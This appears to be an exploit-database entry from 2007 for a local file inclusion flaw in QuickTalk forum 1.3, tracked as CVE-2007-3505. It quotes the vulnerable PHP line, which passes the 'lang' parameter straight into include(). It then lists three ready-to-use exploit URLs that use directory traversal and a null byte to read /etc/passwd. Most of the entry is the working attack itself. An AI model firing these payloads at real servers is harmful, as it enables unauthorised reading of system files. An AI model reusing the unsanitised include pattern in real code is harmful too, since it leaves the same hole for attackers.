QuickTalk forum 1.3 - 'lang' Local File Inclusion



EKU-ID: 12073 CVE: OSVDB-36487;CVE-2007-3505;OSVDB-36486;OSVDB-36485 OSVDB-ID:
Author: Katatafish Published: 2007-06-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


###QuickTalk forum v1.3 Local File Inclusion###

#download: http://www.qt-cute.org/download/qtf13.zip

#found by: katatafish (karatatata@hush.com)

#vulncode:
 $strLang = $_GET["lang"];
 include("language/$strLang/qtf_lang_reg.inc");

#exploits:

 http://www.site.com/[path]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
 http://www.site.com/[path]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00
 http://www.site.com/[path]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00

#thanks:str0ke

# milw0rm.com [2007-06-27]